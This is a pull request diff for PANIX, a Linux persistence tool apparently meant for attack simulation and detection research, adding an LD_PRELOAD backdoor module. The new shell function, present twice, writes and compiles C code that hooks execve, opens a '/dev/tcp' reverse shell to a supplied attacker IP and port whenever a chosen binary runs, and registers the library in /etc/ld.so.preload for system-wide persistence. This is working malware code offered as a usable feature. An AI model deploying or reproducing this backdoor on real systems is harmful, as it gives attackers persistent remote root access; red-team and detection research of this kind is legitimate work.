### PR TITLE
[FR] LD_PRELOAD Persistence

### DIFF
--- a/README.md
+++ b/README.md
@@ -26,6 +26,7 @@ PANIX provides a versatile suite of features for simulating and researching Linu
 | **Init.d Backdoor**              | SysV Init (init.d) persistence                                                          | ✓    | ✗    |
 | **Malicious Package Backdoor**   | DPKG/RPM package persistence                                                            | ✓    | ✗    |
 | **Docker Container Backdoor**    | Docker container with host escape                                                       | ✓    | ✓    |
+| **LD_PRELOAD Backdoor**          | LD_PRELOAD backdoor                                                                     | ✓    | ✗    |
 | **LKM Backdoor**                 | Loadable Kernel Module (LKM) backdoor                                                   | ✓    | ✗    |
 | **MOTD Backdoor**                | Message Of The Day (MOTD) persistence                                                   | ✓    | ✗    |
 | **Package Manager Persistence**  | Package Manager persistence (APT/YUM/DNF)                                               | ✓    | ✗    |
@@ -126,6 +127,7 @@ Root User Options:
   --generator           Generator persistence
   --git                 Git hook/pager persistence
   --initd               SysV Init (init.d) persistence
+  --ld-preload          LD_PRELOAD backdoor persistence"
   --lkm                 Loadable Kernel Module (LKM) persistence
   --malicious-package   Build and Install a package for persistence (DPKG/RPM)
   --motd                Message Of The Day (MOTD) persistence (not available on RHEL derivatives)

--- a/main.sh
+++ b/main.sh
@@ -92,6 +92,11 @@ main() {
 				setup_initd_backdoor "$@"
 				exit
 				;;
+			--ld-preload )
+				shift
+				setup_ld_preload_backdoor "$@"
+				exit
+				;;
 			--lkm )
 				shift
 				setup_lkm_backdoor "$@"

--- a/modules/common.sh
+++ b/modules/common.sh
@@ -55,6 +55,7 @@ usage_root() {
 	echo "  --generator           Generator persistence"
 	echo "  --git                 Git hook/pager persistence"
 	echo "  --initd               SysV Init (init.d) persistence"
+	echo "  --ld-preload          LD_PRELOAD backdoor persistence"
 	echo "  --lkm                 Loadable Kernel Module (LKM) persistence"
 	echo "  --malicious-package   Build and Install a package for persistence (DPKG/RPM)"
 	echo "  --motd                Message Of The Day (MOTD) persistence (not available on RHEL derivatives)"

--- a/modules/setup_ld_preload.sh
+++ b/modules/setup_ld_preload.sh
@@ -1,0 +1,150 @@
+setup_ld_preload_backdoor() {
+    local ip=""
+    local port=""
+    local binary=""
+    local preload_compile_dir="/tmp/preload"
+    local preload_name="preload_backdoor"
+    local preload_source="${preload_compile_dir}/${preload_name}.c"
+    local preload_lib="/lib/${preload_name}.so"
+    local preload_file="/etc/ld.so.preload"
+
+    # Ensure the function is executed as root
+    if [[ $UID -ne 0 ]]; then
+        echo "Error: This function can only be run as root."
+        exit 1
+    fi
+
+    usage_ld_preload_backdoor() {
+        echo "Usage: ./panix.sh --ld-preload [OPTIONS]"
+        echo "--examples                   Display command examples"
+        echo "--ip <ip>                    Specify IP address for reverse shell"
+        echo "--port <port>                Specify port for reverse shell"
+        echo "--binary <binary>            Specify binary to monitor"
+        echo "--help|-h                    Show this help message"
+    }
+
+    while [[ "$1" != "" ]]; do
+        case $1 in
+            --ip )
+                shift
+                ip=$1
+                ;;
+            --port )
+                shift
+                port=$1
+                ;;
+            --binary )
+                shift
+                binary=$1
+                ;;
+            --examples )
+                echo "Examples:"
+                echo "./panix.sh --ld-preload --ip 192.168.211.131 --port 4444 --binary /usr/bin/whoami"
+                exit 0
+                ;;
+            --help|-h )
+                usage_ld_preload_backdoor
+                exit 0
+                ;;
+            * )
+                echo "Invalid option for --ld-preload: $1"
+                echo "Try './panix.sh --ld-preload --help' for more information."
+                exit 1
+        esac
+        shift
+    done
+
+    if [[ -z $ip || -z $port || -z $binary ]]; then
+        echo "Error: --ip, --port, and --binary must be specified."
+        echo "Try './panix.sh --ld-preload --help' for more information."
+        exit 1
+    fi
+
+    # Ensure GCC is installed
+    if ! command -v gcc &>/dev/null; then
+        echo "Error: GCC is not installed. Please install it to proceed."
+        echo "For Debian/Ubuntu: sudo apt install gcc"
+        echo "For Fedora/RHEL/CentOS: sudo dnf install gcc"
+        exit 1
+    fi
+
+    # Ensure the compile directory exists
+    mkdir -p ${preload_compile_dir}
+
+    # Generate the C source code for the LD_PRELOAD backdoor
+    cat <<-EOF > ${preload_source}
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <dlfcn.h>
+#include <sys/types.h>
+
+// Reverse shell configuration
+#define ATTACKER_IP "$ip"
+#define ATTACKER_PORT $port
+
+// Function pointer for the original execve
+int (*original_execve)(const char *pathname, char *const argv[], char *const envp[]);
+
+// Function to spawn a reverse shell in the background
+void spawn_reverse_shell() {
+    pid_t pid = fork();
+    if (pid == 0) { // Child process
+        setsid(); // Start a new session
+        char command[256];
+        sprintf(command, "/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'", ATTACKER_IP, ATTACKER_PORT);
+        execl("/bin/bash", "bash", "-c", command, NULL);
+        exit(0); // Exit child process if execl fails
+    }
+}
+
+// Hooked execve function
+int execve(const char *pathname, char *const argv[], char *const envp[]) {
+    // Load the original execve function
+    if (!original_execve) {
+        original_execve = dlsym(RTLD_NEXT, "execve");
+        if (!original_execve) {
+            exit(1);
+        }
+    }
+
+    // Check if the executed binary matches the specified binary
+    if (strstr(pathname, "$binary") != NULL) {
+        // Spawn reverse shell in the background
+        spawn_reverse_shell();
+    }
+
+    // Call the original execve function
+    return original_execve(pathname, argv, envp);
+}
+EOF
+
+    # Check if the source file was created
+    if [ ! -f "$preload_source" ]; then
+        echo "Failed to create the LD_PRELOAD source code at $preload_source"
+        exit 1
+    else
+        echo "LD_PRELOAD source code created: $preload_source"
+    fi
+
+    # Compile the shared object
+    gcc -shared -fPIC -o $preload_lib $preload_source -ldl
+    if [ $? -ne 0 ]; then
+        echo "Compilation failed. Exiting."
+        exit 1
+    fi
+
+    echo "LD_PRELOAD shared object compiled successfully: $preload_lib"
+
+    # Add to /etc/ld.so.preload for persistence
+    if ! grep -q "$preload_lib" "$preload_file" 2>/dev/null; then
+        echo $preload_lib >> $preload_file
+        echo "[+] Backdoor added to /etc/ld.so.preload for persistence."
+    else
+        echo "[!] Backdoor already present in /etc/ld.so.preload."
+    fi
+
+    echo "[+] Execute the binary $binary to trigger the reverse shell."
+}

--- a/panix.sh
+++ b/panix.sh
@@ -56,6 +56,7 @@ usage_root() {
 	echo "  --generator           Generator persistence"
 	echo "  --git                 Git hook/pager persistence"
 	echo "  --initd               SysV Init (init.d) persistence"
+	echo "  --ld-preload          LD_PRELOAD backdoor persistence"
 	echo "  --lkm                 Loadable Kernel Module (LKM) persistence"
 	echo "  --malicious-package   Build and Install a package for persistence (DPKG/RPM)"
 	echo "  --motd                Message Of The Day (MOTD) persistence (not available on RHEL derivatives)"
@@ -1438,6 +1439,158 @@ setup_initd_backdoor() {
 		establish_persistence
 		echo "[+] init.d backdoor established"
 	fi
+}
+
+# Module: setup_ld_preload.sh
+setup_ld_preload_backdoor() {
+    local ip=""
+    local port=""
+    local binary=""
+    local preload_compile_dir="/tmp/preload"
+    local preload_name="preload_backdoor"
+    local preload_source="${preload_compile_dir}/${preload_name}.c"
+    local preload_lib="/lib/${preload_name}.so"
+    local preload_file="/etc/ld.so.preload"
+
+    # Ensure the function is executed as root
+    if [[ $UID -ne 0 ]]; then
+        echo "Error: This function can only be run as root."
+        exit 1
+    fi
+
+    usage_ld_preload_backdoor() {
+        echo "Usage: ./panix.sh --ld-preload [OPTIONS]"
+        echo "--examples                   Display command examples"
+        echo "--ip <ip>                    Specify IP address for reverse shell"
+        echo "--port <port>                Specify port for reverse shell"
+        echo "--binary <binary>            Specify binary to monitor"
+        echo "--help|-h                    Show this help message"
+    }
+
+    while [[ "$1" != "" ]]; do
+        case $1 in
+            --ip )
+                shift
+                ip=$1
+                ;;
+            --port )
+                shift
+                port=$1
+                ;;
+            --binary )
+                shift
+                binary=$1
+                ;;
+            --examples )
+                echo "Examples:"
+                echo "./panix.sh --ld-preload --ip 192.168.211.131 --port 4444 --binary /usr/bin/whoami"
+                exit 0
+                ;;
+            --help|-h )
+                usage_ld_preload_backdoor
+                exit 0
+                ;;
+            * )
+                echo "Invalid option for --ld-preload: $1"
+                echo "Try './panix.sh --ld-preload --help' for more information."
+                exit 1
+        esac
+        shift
+    done
+
+    if [[ -z $ip || -z $port || -z $binary ]]; then
+        echo "Error: --ip, --port, and --binary must be specified."
+        echo "Try './panix.sh --ld-preload --help' for more information."
+        exit 1
+    fi
+
+    # Ensure GCC is installed
+    if ! command -v gcc &>/dev/null; then
+        echo "Error: GCC is not installed. Please install it to proceed."
+        echo "For Debian/Ubuntu: sudo apt install gcc"
+        echo "For Fedora/RHEL/CentOS: sudo dnf install gcc"
+        exit 1
+    fi
+
+    # Ensure the compile directory exists
+    mkdir -p ${preload_compile_dir}
+
+    # Generate the C source code for the LD_PRELOAD backdoor
+    cat <<-EOF > ${preload_source}
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <dlfcn.h>
+#include <sys/types.h>
+
+// Reverse shell configuration
+#define ATTACKER_IP "$ip"
+#define ATTACKER_PORT $port
+
+// Function pointer for the original execve
+int (*original_execve)(const char *pathname, char *const argv[], char *const envp[]);
+
+// Function to spawn a reverse shell in the background
+void spawn_reverse_shell() {
+    pid_t pid = fork();
+    if (pid == 0) { // Child process
+        setsid(); // Start a new session
+        char command[256];
+        sprintf(command, "/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'", ATTACKER_IP, ATTACKER_PORT);
+        execl("/bin/bash", "bash", "-c", command, NULL);
+        exit(0); // Exit child process if execl fails
+    }
+}
+
+// Hooked execve function
+int execve(const char *pathname, char *const argv[], char *const envp[]) {
+    // Load the original execve function
+    if (!original_execve) {
+        original_execve = dlsym(RTLD_NEXT, "execve");
+        if (!original_execve) {
+            exit(1);
+        }
+    }
+
+    // Check if the executed binary matches the specified binary
+    if (strstr(pathname, "$binary") != NULL) {
+        // Spawn reverse shell in the background
+        spawn_reverse_shell();
+    }
+
+    // Call the original execve function
+    return original_execve(pathname, argv, envp);
+}
+EOF
+
+    # Check if the source file was created
+    if [ ! -f "$preload_source" ]; then
+        echo "Failed to create the LD_PRELOAD source code at $preload_source"
+        exit 1
+    else
+        echo "LD_PRELOAD source code created: $preload_source"
+    fi
+
+    # Compile the shared object
+    gcc -shared -fPIC -o $preload_lib $preload_source -ldl
+    if [ $? -ne 0 ]; then
+        echo "Compilation failed. Exiting."
+        exit 1
+    fi
+
+    echo "LD_PRELOAD shared object compiled successfully: $preload_lib"
+
+    # Add to /etc/ld.so.preload for persistence
+    if ! grep -q "$preload_lib" "$preload_file" 2>/dev/null; then
+        echo $preload_lib >> $preload_file
+        echo "[+] Backdoor added to /etc/ld.so.preload for persistence."
+    else
+        echo "[!] Backdoor already present in /etc/ld.so.preload."
+    fi
+
+    echo "[+] Execute the binary $binary to trigger the reverse shell."
 }
 
 # Module: setup_lkm.sh
@@ -4928,6 +5081,11 @@ main() {
 			--initd )
 				shift
 				setup_initd_backdoor "$@"
+				exit
+				;;
+			--ld-preload )
+				shift
+				setup_ld_preload_backdoor "$@"
 				exit
 				;;
 			--lkm )


### PR DESCRIPTION
## Summary
This PR adds the capability of persisting through LD_PRELOAD by hooking the `execve` call for a binary of choice. I chose to not hook more than necessary to test the technique, as hooking functions may cause the system to become unstable.

This PR closes #21.